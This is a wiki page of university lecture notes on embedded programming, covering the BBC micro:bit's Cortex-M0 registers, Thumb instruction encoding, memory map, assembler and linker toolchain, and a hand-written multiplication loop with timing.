Note: I've just migrated to a different physical server to run Spivey's Corner,
with a new architecture, a new operating system, a new version of PHP, and an updated version of MediaWiki.
Please let me know if anything needs adjustment! – Mike

Notes for Digital Systems: Difference between revisions

Copyright © 2017–2023 J. M. Spivey
Jump to navigation Jump to search
No edit summary
No edit summary
Line 38: Line 38:
{{Include|19|Sequential logic|Flip-flops.  Designing sequential circuits.}}
{{Include|19|Sequential logic|Flip-flops.  Designing sequential circuits.}}


{{Include|20|Architectural elements|Circuits for arithmetic.  Multiplexers.  Register files.  Arithmetic-Logic Unit.  Barrel shifter.}}
{{Include|21|Architectural elements|Circuits for arithmetic.  Multiplexers.  Register files.  Arithmetic-Logic Unit.  Barrel shifter.}}


{{Include|22|Designing a datapath|}}
{{Include|22|Designing a datapath|}}

Revision as of 16:10, 17 July 2022

Lecture 1 – Microcontrollers and embedded programming

Architecture of the micro:bit. Programmer's model. Execution of an instruction.

Introduction

[1.1] In this course, we'll be learning about computer hardware and low-level software. This term, we will start with machine-code programming, learning only enough about the hardware to understand how to program it: then we'll work our way up to programming in a high level language, and using a very simple operating system. Next term, we will dig further down and begin with logic gates and transistors, working our way upwards again until we reach the level of machine instructions and complete the circle. Anything below the level of transistors is magic to us.

This term and next term

The programming we will do, and the machines we will use, are typical of embedded applications, where a computer is used as part of some other product, perhaps without the owner even knowing there is a computer inside. Any device you own that has any kind of display, or buttons to push, probably has a microcontroller inside, rather than any kind of specific digital electronics, and the reason is simple. Microcontrollers – that is, microprocessors with some ROM and RAM integerated on the chip – can be bought today for 50p each or less,[1] and it's much easier to design a board with a microcontroller on it and program it later than to design and build a custom logic circuit.

micro:bit system architecture

[1.2] We will program the BBC micro:bit, a small printed circuit board that contains an ARM-based microcontroller and some other components.

  • As well as the microcontroller, the board has a magnetometer and an accelerometer, connected via an "inter-integrated circuit" (I2C) bus.
  • The board has some LEDs and buttons that provide inputs and outputs.
  • There's also a second microcontroller on board that looks after the USB connection, providing a programming and debugging interface, and allowing access over USB to the serial port (UART) of the main microcontroller.
micro:bit

[1.3] The microcontroller is a Nordic Semiconductor nRF51822.

  • It contains an ARM-based processor core.
  • Also some on-chip RAM (16kB!!!) and ROM (256kB), with the ROM programmable from a host computer.
  • The chip has peripheral devices like GPIO (for the buttons and lights), an I2C interface, and a UART.
  • The chief selling point of the Nordic chips is that they also integrate the radio electronics for Bluetooth, but we probably won't be using that.

The processor core is (almost) the tiniest ARM, a Cortex-M0.

  • It has the same set of 16 registers as any other ARM32, and a datapath that implements the same operations.
  • The instruction set (Thumb) provides a compact 16-bit encoding of the most common instructions.
  • There is an interrupt controller (NVIC) that lets the processor respond to external events.
  • Because of the needs of Bluetooth, the datapath has the snazzy single-cycle multiplier option.

The micro:bit comes with a software stack that is based on the MBED platform supported by ARM, with subroutine libraries that hide the details of programming the hardware I/O devices. On top of that, programmers at Lancaster University have provided a library of drivers for the peripheral devices present on the board, and that provides the basis for various languages that are used for programming in schools, including MicroPython, JavaScript, and something like Scratch. We will ignore all that and program the board ourselves, starting from the bare metal.

Context

Microcontrollers with a 32-bit core are becoming more common, but the market is still dominated by 8-bit alternatives such as the AVR (as used in Arduino) and the PIC – both electrically more robust, but significantly less pleasant to program. As we'll see, the embedded ARM chips have an architecture that is simple, regular, and well suited as a target for compilers. Other 32-bit microcontroller families also exist, such as the PIC-32 family based on the MIPS architecture. One level up are the "System on a chip" products like the ARM processors used in mobile phones and the Raspberry Pi, and the MIPS-based devices that are commonly used in Wifi routers: these typically have hundreds of megabytes of RAM, and run a (possibly slimmed-down) version of a full operating system. By way of contrast, the operating system we shall develop for the micro:bit is really tiny.

Programming the micro:bit

Cortex-M0 registers

[1.4] To start programming the micro:bit at the machine level, we will need to know what registers it has, because registers hold the inputs and outputs of each instruction. Like every 32-bit ARM (including the bigger ARM chips used on the Raspberry Pi), the micro:bit has 16 registers. According to the conventions used on Cortex-M0, register r0 to r7 are general-purpose, and can be used for any kind of value. The group r0 to r3 play a slightly different rôle in subroutine calls from the group r4 to r7, but we'll come to that later.

Registers r8 to r12 are not used much, because as we'll see, the instruction set makes it hard to access them. I don't think we'll use them at all in the programs we write. The remaining three registers all have special jobs:

  • sp is the stack pointer, and contains the address of the lowest occupied memory cell on the subroutine stack.
  • lr is the link register, and contains the address where the current subroutine will return.
  • pc is the program counter, and contains the address of the next instruction to be executed.

There's a seventeenth register psr, also with a special purpose, in fact several purposes attached to different bits. Four of the bits, the comparison flags N, Z, C and V, influence the outcome of conditional branch instructions in a way that we shall study soon. Other bits have meanings that become important when we think of using interrupt-based control or writing an operating system: more of that later.

[1.5] We can begin to see how these registers are used by considering a program with just one instruction. Suppose that the 16-bit memory location at address 192 contains the bit pattern 0001 1000 0100 0000. We could write that in hexadecimal[2] as 0x1840. In other contexts, it might represent the integer 6208, or an orange colour so dark as to be almost black. But here it represents an instruction that would be written in assembly language as adds r0, r0, r1:

0001100 001 000 000
adds    r1  r0  r0

(The fact that the bit-fields of the instruction appear in a different order from the register names in the written instruction doesn't at all matter, provided the assembler program and the hardware agree on the ordering.) When this instruction is executed, the machine adds together the integer quantities that it finds in registers r0 and r1, and puts the result into register r0, replacing whatever value was stored there before.

For example, if the machine is in a state where

 pc = 192     r0 = 23     r1 = 34     r2 = 96     ...     lr = 661     nzcv = 0010

then the next state of the machine will be

 pc = 194     r0 = 57     r1 = 34     r2 = 96     ...     lr = 661     nzcv = 0000

and incidentally (that's the meaning of the s in adds) the NZCV flags have all been set to 0. As you can see, the addition of r0 and r1 has been done, and the result is in r0. Also, the program counter has been increased by 2, because that is the size in bytes of the instruction. (On the Cortex-M0, nearly all instructions are 2 bytes long).

[1.6] As it happens, the next instruction at address 194 is 0x4770, and that decodes as bx lr, an instruction that reloads the program counter pc with the value held in lr, which is the address of the next instruction after the one that called this subroutine.

 pc = 660     r0 = 57     r1 = 34     r2 = 96     ...     lr = 661     nzcv = 0000

A detail: for compatibility with the larger processors, the lr register records in its least significant bit the fact that the processor is in Thumb mode (16 bit instructions): the value is 661 = 0x295 = 0000001010010101. This bit is cleared when the value is loaded into the pc, and the address of the next instruction executed is 0x294; if the 1 bit is not present in lr, then an exception occurs – with the lab programs, the result is the Seven Stars of Death.

At address 0x294 in our program is code compiled from C that outputs the result of the addition over the serial port.

Decoding chart for Thumb instructions

[1.7] You can decode these numeric instructions by consulting the Architecture Reference Manual for the Cortex-M0. As a reminder, I like to keep by me a handy chart (click the preview above) showing all the instruction encodings on one page. You can find the adds instruction in orange on chart [A], and the bx instruction in blue on chart [B].

Instruction decoding

[1.8] On bigger chips in the ARM family (like the ARM11 that is used in the Raspberry Pi), ordinary instructions are 32 bits long, and the more compact 16 bit instructions that are used on the micro:bit are a seldom-used option: why worry about code size when you have 1GB of memory? The 32-bit instruction set is very regular, and lets you express instructions that add or subtract or multiply numbers from any two of the 16 registers and put the result in a third one. This makes the instruction set easy to understand, and the regularity makes the process of writing a compiler easier too. The 16-bit instructions are more restrictive because, as shown above, the fields in an adds instruction for specifying registers are only 3 bits long, and that makes only registers r0 to r7 usable.

As the diagram shows, the bigger chips have two instruction decoders, one for 32-bit native instructions and another for 16-bit Thumb instructions, and there is a multiplexer (the long oval shape) controlled by the mode bit, actually a bit in the psr register, to choose which is used. Both decoders produce the same signals for controlling the datapath that actually executes the instructions, so that the instructions that are expressible in the Thumb encoding agree exactly in their effect with certain 32-bit instructions.

On the micro:bit, the 32-bit decoder is missing, so all instructions must be expressed in the 16-bit encoding, and the mode bit must always be 1. It might be better to say there was no mode bit at all, except for the fact that you can try to set it to 0, and that causes a crash and (with our lab software) shows the Seven Stars of Death on the LEDs.

Context

The Cortex-M0 shares some attributes typical of RISC machines:

  • The large(-ish) set of uniform registers. By way of contrast, early microprocessors had only very few registers, and each had a specific purpose: only the A register could be used for arithmetic, only the X register used for indexed addressing, etc.
  • Arithmetic instructions that operate between registers. The most common instructions (add, sub, cmp) can operate with any two source registers, and write their result (if any) in a third register. There is limited support for embedding small constant operands in the instruction, and separate provision of some kind for loading an arbitary constant into a register.
  • Access to memory uses separate load and store instructions, supporting a limited set of simple addressing modes: in this case, register plus register, and register plus small constant.

The most unusual feature of the ARM ISA is that execution of every instruction – not just branches – can be made dependent on the condition codes. The Thumb encoding gets rid of this, allowing only branches to be conditional.

The simplicity and uniformity that is typical of RISC instruction sets is compromised a bit by the complexity of the Thumb encoding. In theory, the absolute uniformity of a RISC instruction set makes things easy for a compiler; in practice, the restrictions of the Thumb encoding make little difference, because most common operations have a compact encoding, and the restrictions are easy enough to incorporate in a compiler that generates code by following a set of explicit rules.

In the next few lectures, we will explore programming the micro:bit at the machine level, slowly increasing the range of machine features our programs will use:

  • first, we'll use instructions that ask for arithmetic and logical operations on values that are stored in the registers of the machine, using them in straight-line programs.
  • then, we'll add branch instructions that let us express conditional execution and loops, so that programs can express more than a single, limited chain of calculations.
  • next, we'll introduce subroutines, or rather, we'll write assembly language programs with several subroutines, with one able to call another.
  • finally, we add the ability to load and store values in the random-access memory of the machine, so that programs can work on more data than will fit in the small set of registers.

Two points about this sequence of tours of the machine:

  • First, we're not studying these things because of any need to use assembly language to write actual programs. In the olden days, compilers were weaker, and sometimes programmers would use assembly language to speed up small but vital parts of their programs. Those days are past, and now compilers are able to generate perfectly good code without our help – in fact, code that is often better than we could write by hand, because they are able to deal with tedious details that would overwhelm our patience. Also, it used to be that some assembly language was needed as an interface between the hardware and code compiled from a high-level language, or perhaps to initialise the machine when it first woke up. Those days are gone too, and in Lab zero, our very first program will be written entirely in C, with no assembly-language parts at all. It's a strength of the ARM design that this is possible.
  • The second point: we are not going to start programming from scratch. In the good old days, you could sit at the console of the machine, toggle in a program in binary, then execute it step by step, stopping between each instruction and the next to examine the contents of registers. Those days are long gone, alas, and what we will do instead is use a main program written in C to feed values to an assembly-language subroutine (written by us) and print the results it returns. We won't study until much later the techniques that main program uses to do input and output, but will just take for granted that it does its job. You have to start somewhere!

Questions

How does the processor know how many instruction bits to use as the opcode?

This answer must have two parts: (i) what algorithm can be used to decode an instruction? and (ii) how can the algorithm be implemented as an electronic circuit? I'll leave part (ii) for next term: for now it's enough to see that there's a pencil-and-paper algorithm that solves the problem. And that's simple – use the rainbow chart. Look up the first seven bits of the instruction in table [A]. If the result is a coloured region, that is the instruction, and what instruction it is determines the detailed way the rest of the bits are interpreted. (If the coloured region is more than one cell, then some of the first seven bits will contribute to the detail too.) If table [A] gives a reference to another table, then take a few more bits of the instruction and look them up in that table.

Note that there are several entries in the rainbow chart that are labelled with a mnemonic like adds, and they're distinguished by my invented notations adds r (meaning add between registers), adds i3 (meaning add with a 3-bit immediate field), etc. All are generated from assembly language instructions beginning adds, and the assembler knows how to choose the encoding based on the pattern of operands. Each of these variants (more or less) has its own page in the ARM Architecture Reference Manual.

How does the control unit know to interpret the last nine bits of an adds instruction 0x1840 as the names of three registers?

The leading few bits of the instruction, up to 10 of them, determine which instruction encoding applies – adds ra, rb, rc in this case, determined by the leading seven bits. This determines the interpretation of the rest of the instruction. In this case the remaining nine bits are fed by the control unit to the datapath in three groups of three so as to determine which registers take part in the addition.

0001100 001 000 000     adds r0, r0, r1
adds    r1  r0  r0

There's another instruction encoding where a three-bit constant is fed to the datapath as the second operand instead of a register.

0001110 011 001 000     adds r0, r1, #3
adds    3   r1  r0

The control unit behaves differently in the two cases because the opcode is different. The colourful decoding chart enables us to deduce what instruction encoding applies to any string of 16 bits, but it doesn't specify exactly how the remaining bits are interpreted: in this case, it tells us that nine bits of the instruction are three register names or two registers and a three-bit constant, but not what order they appear. For that, you need to look at the appropriate page in the Architecture Reference Manual.

When programming, I mostly find the chart useful as a reminder of what encodings exist: for example, the instructions

adds r0, r1, #3

and

adds r0, r0, #27

are legal, but

adds r0, r1, #27

is not, because there is no way to encode it, and you have to write movs r0, r1; adds r0, r0, #27 instead.

Lecture 2


  1. https://uk.farnell.com/stmicroelectronics/stm32f030f4p6tr/mcu-32bit-cortex-m0-48mhz-tssop/dp/2432084
  2. In this course, I'll always write hexadecimal constants using the C notation 0x...

Lecture 2 – Building a program

Compiling and building a program.

Memory map

Memory map

[2.1] The other piece of information needed to design programs for the micro:bit is the layout of the memory. As the diagram shows, there are three elements, all within the same address space:

  • 256kB of Flash ROM, with addresses from 0x0000 0000 to 0x0003 ffff. This is where programs downloaded to the board are stored. Significantly, address zero is part of the Flash, because it is there that the interrupt vectors are stored that, among other things, determine where the program starts.
  • 16kB of RAM, with addresses from 0x2000 0000 to 0x2000 3fff. This is where all the variables for programs are stored: both the global variables that are not part of any subroutine, and the stack frames that contain local variables for each subroutine activation.
  • I/O registers in the range from 0x4000 0000 upward. Specific locations in this range correspond to particular I/O devices. For example, storing a character at address UART_TXD = 0x4000 251c will have the effect of transmitting it over the serial port, and storing a 32-bit value at GPIO_OUT = 0x5000 0504 has the effect of illuminating some or all of the LEDs on the board.

It's possible for the contents of Flash to be modified under program control, but we shall not use that feature.

Naturally enough, information about the layout of memory must form part of any programs that run on the machine. In our code, it is reflected in two places: the linker script NRF51822.ld contains the addresses and sizes of the RAM and ROM, and instructions about what parts of the program go where; and the header file hardware.h contains the numeric addresses of I/O device registers like UART_TXD and GPIO_OUT. This information comes from the data sheet for the nRF51822 chip.

To think about: why was the nRF51822 designed with so little RAM?

Context

Other microcontrollers adopt two alternatives to this single-address-space model:

  • Sometimes I/O devices are accessed with special instructions, and have their own address space of numbered 'ports'. This is not really such a significant difference, because performing I/O still amounts to selecting a port by its address and performing a read or write action.
  • Sometimes the processor has its program in a different address space from its data. This is an attractive option for microcontrollers, where the program is usually fixed and can be stored in a ROM separate from the RAM that is used for data. It's called a 'Harvard archtecture', in contrast with the 'von Neumann architecture' with a single memory. If the two address spaces are separate, then separate hardware can be used to access the ROM and the RAM, and it can access both simultaneously without fear of interference between the two. The disadvantage is that special instructions are usually needed to access, e.g., tables of constant data held in the ROM.

More complex processors with cache memory between the processor and RAM often adopt a 'modified Harvard archicture' where there are independent caches, concurrently accessible, for code and data, but with a single, uniform RAM behind them.

Building a program

Source code: lab1-asm

Lab one for this course lets you write small subroutines in Thumb assembly language and test them, using a main program that prompts for two numbers, calls your subroutine with the two numbers as arguments, then prints the arguments and result.

As you will see in the demo, the arguments and result are shown both in decimal and in hexadecimal; you can enter numbers in hexadecimal too by preceding them with the usual 0x prefix.

[2.2] This program is built from your one subroutine written in assembly language, with the rest of the program written in C for convenience. (At some point, we'll make a program written entirely written in assembly language just to demonstrate that it's possible.) Let's begin by looking at the entire contents of the source file add.s that defines the function foo. The lines starting with @ are comments.

@ This file is written in the modern 'unified' syntax for Thumb instructions:
        .syntax unified

@ This file defines a symbol foo that can be referenced in other modules        
        .global foo

@ The instructions should be assembled into the text segment, which goes
@ into the ROM of the micro:bit
        .text

@ Entry point for the function foo
        .thumb_func
foo:
@ ----------------
@ Two parameters are in registers r0 and r1

        adds r0, r0, r1          @ One crucial instruction

@ Result is now in register r0
@ ----------------
@ Return to the caller
        bx lr

[2.3] The one instruction that matters is the line reading adds r0, r0, r1. Let's assemble the program:

$ arm-none-eabi-as add.s -o add.o

This command takes the contents of file add.s, runs them through the ARM assembler, and puts the resulting binary code in the file add.o. We can see this code by dis-assembling the file add.o, using the utility objdump.

$ arm-none-eabi-objdump -d add.o
00000000 <foo>:
   0:  1840            adds    r0, r0, r1
   2:  4770            bx      lr

This reveals that the instruction adds r0, r0, r1 is represented by the 16 bit value written as hexadecimal 0x1840.

The program also contains four files of C code, and we will need to translate those also into binary form using the compiler arm-none-eabi-gcc. The easy way to do that is to invoke the command make, because the whole procedure for building the program has been described in a Makefile:

$ make
arm-none-eabi-gcc -mcpu=cortex-m0 -mthumb -g -O -c main.c -o main.o
arm-none-eabi-gcc -mcpu=cortex-m0 -mthumb -g -O -c lib.c -o lib.o
arm-none-eabi-gcc -mcpu=cortex-m0 -mthumb -g -O -c startup.c -o startup.o

Notice that the C compiler is being asked to generate Thumb code for the Cortex-M0 core that is present in the micro:bit; it is also being asked to include debugging information in its output (-g), and to optimise the object code a bit (-O). We don't use higher levels of optimisation (-O2 or -Os, because they make the object code harder to understand and interfere with running it under a debugger.)

What are these files of C code anyway? Well, main.c contains the main program, with the loop that prompts for two numbers, passes them to your foo subroutine, then prints the result. It also contains a simple driver for the micro:bit's serial port so that the program can talk to a host PC via USB and minicom. The file lib.c contains a simple implementation of the formatted output function printf that we shall use in most of our programs. Finally, the file startup.c contains the code that runs when the micro:bit starts ("comes out of reset"), setting things up and then calling the main program.

Compiling and linking

[2.4] Having done all this compiling and assembling, we have four binary files with names ending in .o. To make them into one program, we need to concatenate the code from all these files, then fix them up so that references from one file to another (and within a single file too) use the right address. All this is done by the linker ld, or more accurately arm-none-eabi-ld. Often, we invoke the linker via the C compiler gcc, because that lets gcc add its own libraries into the mix; but so that we can see all that is happening, the Makefile contains a command to invoke ld directly:

arm-none-eabi-ld add.o main.o lib.o startup.o \
    /usr/lib/gcc/arm-none-eabi/5.4.1/armv6-m/libgcc.a \
    -o add.elf -Map add.map -T nRF51822.ld

This links together the various .o files, and also a library libgcc.a that contains routines that the C compiler relies on to translate certain C constructs – in particular, the integer division that is used in converting numbers for printing. The output file add.elf is another file of object code in the same format as the .o files. Another output from the linker is a report add.map that shows the layout of memory, and that layout is determined partially by the linker script nRF51922.ld that describes the memory map of the chip and what each memory area should be used for. You'll see that the Makefile next invokes a program size to report on the size of the resulting program, so we can see how much of the memory has been used: not much in this case.

The file add.elf contains the binary code for the program, but sadly it is in the wrong format for downloading to the board. So the final step of building described in the Makefile converts the code into "Intel hex" format, which is what the board expects to receive over USB.

arm-none-eabi-objcopy -O ihex add.elf add.hex

Building is now done, and we can copy the file add.hex to the board. On my machine, I can type

$ cp add.hex /media/mike/MICROBIT

and the job is done. (Something like

$ cp add.hex /run/media/u19abc/MICROBIT

is needed on the Software Lab machines.)

Although it's not necessary for running the program, it's fun to check that the binary instructions 0x1840 and 0x4770 appear somewhere in the code. If you look in add.hex, you will find that line 13 is

:1000C00040187047074B1B68002B03D1064A136882

and that contains the two fragments 4018 and 7047, which rearrange to give 1840 and 4770. (Why is the rearrangement neeed? You can find a specification for Intel hex format on Wikipedia.)

Alternatively, you can make a pure binary image of the program with the command

$ arm-none-eabi-objcopy -O binary add.elf add.bin

and then look at a hexadecimal dump of that file, divided into 16-bit words:

$ hexdump add.bin
...
00000c0 1840 4770 4b07 681b 2b00 d103 4a06 6813

(Even on a 32-bit machine, tradition dictates that hexdump splits the file into 16-bit chunks.) As you can see, the two instructions 0x1840 and 0x4770 appear at address 0xc0 in the image.

Other instructions

For the single adds instruction that appears in func.s, we can substitute others.

  • There is an instruction subs that subtracts instead of adding. We quickly find that (one of) the conventions for representing numbers as bit patterns allow negative numbers to be represented also.
subs r0, r0, r1
  • Since subtraction is not commutative, it makes a difference if we specify the inputs in the opposite order
subs r0, r1, r0
  • The Nordic chip has the optional multiplier, so it implements the muls instruction, but Thumb code imposes the restriction that the output must be the same as one of the inputs. You can see this from the Reference Manual page for muls
muls r0, r0, r1
  • We can use several instructions to compute more complex expressions. Here we compute a * (b + 3) by first putting b + 3 in register r2.
adds r2, r1, #3
muls r0, r0, r2
  • If we try a * 5 + b, then we find there is no form of the muls instruction that contains a constant. So we write instead
movs r2, #5
muls r0, r0, r2
adds r0, r0, r1

Thumb code restricts what sensible operations actually exist as instructions. At first sight, this is irksome and requires us to memorise lots of silly rules. But with a bit of experience, we find that most instructions we want to write can actually be written, and for most purposes we can give over the generation of instructions to a compiler, which is better than us at encoding and applying the rules.

  • For an expression like (a + b) * (a - b), we will need to compute at least one of the operands of the multiplication into a register other than r0 and r1. Registers r2 and r3 are freely available for this purpose, so let's choose r3.
subs r3, r0, r1
adds r0, r0, r1
muls r0, r0, r3

Experience with the debugger shows that when func is called, register r2 and r5 contain copies of b. The ABI – that is, the conventions about what registers can be used where – allows us to change the value in r2, as we did in a * (b + 3) example. What if we naughtily change the value in r5 instead?

movs r5, #5
muls r0, r0, r5
adds r0, r0, r1

Ah! It changes the value of b that is printed by the main program:

a = 10                                                                          
b = 1                                                                           
func(10, 5) = 51                                                                
func(0xa, 0x5) = 0x33                                                           
6 cycles, 0.375 microsec

We see that the main program was saving the value of b in r5 across the call to func(a, b) so that it could print it afterwards. (The value of a is saved in memory, presumably). By overwriting r5 we have spoiled that. For a leaf routine like func that calls no others, only registers r0 to r3 can be changed unless we take steps to restore them before returning. When we start to write subroutines that call others, we will be able to exploit this by ourselves keeping values in r4 to r7 that we expect to be preserved y those other subroutines. So there is a kind of contract, imposed by convention not be the hardware, that ensures that subroutines can work together harmoniously. The contract covers the fact that arguments are passed in r0 to r3 and the return address in lr, the result is returned in r0, and r4 to r7 (actually, r8 to r11 too) must be preserved. Subroutines that need more registers than r0 to r3 must take steps to save and restore those other registers that it uses. Subroutines that call others must at least preserve the value of lr they receive so that they can return properly. Mechanisms for all of this will emerge later in the course.

Instruction encodings

At first sight, it seems that the rules for what instructions can be encoded in the Thumb format will be irksome in programming, but in practice they are not a great burden. This is partly because the statistically commonest instructions tend to have an encoding, thanks to the skill of the ARM designers, but also because a lot of our work with assembly language programs is in reading them and understanding what they do, rather than writing them by hand. A compiler can easily be made to follow the rules blindly and produce legal and efficient programs.

In detail, additions involving the low registers r0 to r7 come in several encodings. First, there's the three-register version

adds r0, r1, r2

that is encoded like this:

Adds-rrr format.png

If the first two registers mentioned in the instruction are the same, as in adds r0, r0, r1, then the assembler lets us write the instruction as adds r0, r1 instead, but that doesn't affect the binary code that it generates, which is the same in both cases.

For adding a constant to the contents of a register, there are two ways of encoding the instruction. One encoding allows the result to be put in a different register from the operand.

Adds-rri format.png

Let's call that Form A. As you can see, there are only three bits to encode the constant, so the allowable range is from 0 to 7. Form B requires the source and destination registers to be the same, but has space for an 8-bit constant with a value from 0 to 255.

Adds-ri format.png

The assembler lets us write the same instruction either as adds r0, #1 or as adds r0, r0, #1, producing the same binary code in either case. If you look back at your own programs, you will probably find that by far the most common form of addition is the statement

count = count + 1;

and if count lives in a register, this is easily encoded using either Form A or Form B; the assembler happens to use Form B in this case.

Subtract instructions subs between low registers can be encoded in exactly the same variety of ways as adds instructions. As regards the other instructions we have used, move instructions have two variations, depending on whether the source is a register or a constant. There is a register-to-register form:

Movs-rr format.png

Actually, this turns out to be a special case of the lsls instruction that shifts the register contents left by a number of bits, with the number being zero, so the instruction movs r0, r1 can also be written lsls r0, r1, #0. We will have more to say about shift instructions later.

The form of movs that puts a constant in a register allows any constant from 0 to 255 in an 8-bit field.

Movs-ri format.png

For many programs, we will need constants that don't fit in 8 bits; they require a special treatment that will be introduced later.

Unlike adds and subs, the multiply instruction muls exists only in a form where it operates between registers, and requires the output register to be the same as one of the input registers.

Muls-rr format.png

Assembly language syntax

As well as the two instructions adds r0, r0, r1 and bx lr, the assembly language file func.s contains several other elements. These can be copied without much change into most other assembly language programs we write, but for completeness I will explain them here.

All the lines that begin with an at-sign @ are comments, ignored by the assembler in translating the program. The last part of a line containing another element can also be a comment prefixed by @: this is helpful because most lines of assembly language deserve a comment explaining what is going on in the program.

Other lines contain directives that affect the way the assembler translates the program.

    .syntax unified

This tells the assembler that the remainder of the file is written using the most recent, 'unified', conventions for ARM code, where instructions are written the same way whether they are translated into Thumb code or native ARM code – and not the earlier, 'divided', conventions that were different for different chips.

    .global func

This makes the label func accessible to other modules in the program: it's necessary so that the main program that prompts for inputs and prints the results can call our subroutine.

    .text

This causes the code that follows to be placed in the text segment of the program, which the linker will later load into the Flash memory of the micro:bit, as is appropriate for the instructions that make up the program.

    .thumb_func
func:

These two lines begin a subroutine named func that will be assembled into Thumb code. The .thumb_func directive labels the subroutine as being in Thumb code, and this sometimes affects the way it is called. Usually, the directive can be omitted, but for those few times when it's needed, it's simplest to include it always. The instructions that make up the subroutine func follow.

Questions

What is the file /usr/lib/gcc/arm-none-eabi/5.4.1/armv6-m/libgcc.a that is mentioned when a program is linked?

It's a library archive (extension .a) containing subroutines that may be called from code compiled with gcc. For example, the program in Lab 1 contains C a subroutine (xtoa in lib.c) for converting numbers from binary to decimal or hexadecimal for printing, and that subroutine contains the statement x = x / base. Since the chip has no divide instruction, gcc translates the statement into a call to a subroutine with the obscure name __aeabi_uidiv, and that subroutine is provided in the library archive. Exercise 1.6 asks you to write a similar subroutine for yourself.

If you're prepared to use that integer division subroutine from the gcc library, why not use the library version of printf too, instead of writing your own?

Using the library version of printf pulls in a lot of other stuff – for example, since the standard printf can format floating-point numbers, including it also drags in lots of subroutines that implement floating-point arithmetic in software. That's OK, but (a) I wanted to keep our programs small for simplicity, and (b) although we are not likely to fill up the 256kB of code space on the nRF51822, on other embedded platforms it's wise to keep a close eye on the amount of library code that is included in the program but not really used. Added to that, the version of printf in the standard library can call malloc, and we don't want that.

Lecture 3

Lecture 3 – Multiplying numbers

Conditional and unconditional branches. Instruction encodings. Execution time.


Multiplying numbers

[3.1] The nRF51822 implements the optional integer multiply instruction, but let's pretend for a little while that it doesn't, and write our own subroutine for multiplying two integers together. We could write it in C.

unsigned foo(unsigned a, unsigned b) {
    unsigned x = a, y = b, z = 0;

    /* Invariant: a * b = x * y + z */
    while (y != 0) {
        y = y - 1;
        z = z + x;
    }

    return z;
}

Here we use the unsigned type that represents integers in the range [math]\displaystyle{ [0\ldotp\ldotp2^{32}) }[/math], because the simple algorithm doesn't deal with negative numbers. It is the simplest algorithm imaginable, computing a * b by adding together b copies of a.

Let's rewrite that subroutine in assembly language, partly for practice, and partly so we can study what takes the time when we run it on a machine. We will follow the convention that the two arguments a and b arrive in registers r0 and r1: if we arrange to keep x in r0 and y in r1 during the subroutine body, then we won't have to do anything to set x to a and y to b initially. We'll keep z in r2.

[3.2] Here's an implementation of the same subroutine in assembly language, obtained by translating the C code line by line.

foo:
@ -----------------
        movs r2, #0         @ z = 0
loop:
        cmp r1, #0          @ if y == 0
        beq done            @     jump to done
        subs r1, r1, #1     @ y = y - 1
        adds r2, r2, r0     @ z = z + x
        b loop              @ jump to loop
done:
        movs r0, r2         @ put result in r0
@ -----------------
        bx lr

There are many things to notice here.

  • Arithmetic happens between registers, so
subs r1, r1, #1
subtracts the constant 1 from register r1, putting the result back in r1. And
adds r2, r2, r0
adds the number in r0 to the number in r2, putting the result back in r2.
  • Control structures like the while loop are implemented with conditional and unconditional branches. Thus, the two instructions
cmp r1, #0
beq done
compare the number in r1 with the constant 0; if they are equal, the second instruction "branch-if-equal" takes effect, and execution of the program continues at label done instead of the next instruction. The cmp instruction sets the four bits NZCV in the processor status word according to the result of the comparison, and the beq instruction interprets these bits to find whether the two values compared were equal; it branches if the Z bit is 1. At the end of the loop is an unconditional branch back to the start, written
b loop

Context

This scheme of having condition codes set by arithmetic instructions or by explicit comparisons, followed by conditional branches that test the condition codes, is an almost universal feature of instruction set architectures, and the interpretation of the NZCV bits is practically standard. Only a few architectures (e.g., the MIPS) are different.

  • We can set a register to a small constant (in the range [0..256) ) with an instruction like
movs r2, #0
or copy a value from one register to another with
movs r0, r2
That's used in the subroutine to put the result (accumulated in r2) into the register r0 where out caller expects to find it.
  • In a simple subroutine like this, we are free to use registers r0, r1, r2, r3 as we like, without worrying that they may hold values needed elsewhere. We can also use r4 to r7, provided we preserve and restore their values, in way we shall see later.

[3.3] By disassembling the program, we can see how these new instructions are encoded.

$ arm-none-eabi-objdump -d mul1.o
00000000 <foo>:
   0:  2200      movs    r2, #0 
00000002 <loop>:
   2:  2900      cmp     r1, #0
   4:  d002      beq.n   0xc <done>
   6:  3901      subs    r1, #1
   8:  1812      adds    r2, r2, r0
   a:  e7fa      b.n     0x2 <loop>
0000000c <done>:
   c:  0010      movs    r0, r2
   e:  4770      bx      lr

Note that at offset 0x4, the beq instruction is assembler as 0xd002: in binary,

1101 0000 00000010
b    eq   offset 2

When the branch is taken, the target address is the address of the instruction, plus 4, plus twice the offset: 0x4 + 4 + 2 * 2 = 0xc. Each conditional branch contains an 8-bit signed offset relative to pc+4 that is multiplied by 2. (The instruction is shown as beq.n because it is the narrow form of beq that fits in 16 bits; other ARM variants have a wide variant also, which the Cortex-M0 lacks.)

An unconditional branch has an 11-bit offset, so at 0xa we find 0xe7fa, or in binary,

11100 11111111010
b     offset -6

The target address is 0xa + 4 - 2 * 6 = 0x2.

Glancing at the other instructions, the subs is encoded like this:

00111 001 00000001
subs  r1  const 1

You can see that, in this form of instruction that subtracts a constant from a register and puts the result back in the register, we have three bits to specify any register in the range r0--r7, and eight bits to specify a constant in the range [0..256).

The adds instruction is encoded in a form where three registers can be specified, so the result could have been put in a different place from the two inputs.

0001100 000 010 010
adds    r0  r2  r2

Only adds and subs exist in this form. As we shall see, other arithmetic and logical operations exist only in a form where the result register is the same as one of the inputs. This isn't because of any restrictions on what the core of the processor can do, but a matter of using the 16-bit instruction space in the most useful way.

Context

The Cortex-M0 (like other ARM variants) with the usual calling convention makes special provision for a small subroutine like this that makes no access to (data) memory, receiving its arguments in registers, saving the return address in a register, and returning its result in a register. More complex subroutines do need to access memory, if they need to use more than a few registers, or if they need to call another subroutine, but simple 'leaf' routines are common enough that this gives useful savings. By way of contrast, the x86 has a calling convention where subroutine arguments and the return address are always stored on the stack, so that use of memory cannot be avoided.

Timing the program

[3.4] How fast (or how slow) is this routine? We can predict the timing easily on a simple machine like the Cortex-M0, because each instruction in the program takes one clock cycle to execute, except that a taken branch causes an additional two cycles to be lost before the machine executes the instruction at the branch target address. Thus the loop in the subroutine contains five instructions, but in a typical iteration (any but the last) takes seven cycles, one for each instruction, including the untaken beq, and two extra cycles for the taken b instruction. And the number if of iterations is equal to the argument a.

Connecting the logic anayser. The ground wire (white) is connected to the micro:bit's ground, and channel 1 (black) to Pin 3, which is high during the timing pulse. (I've used a breakout board to make the connections easier.)

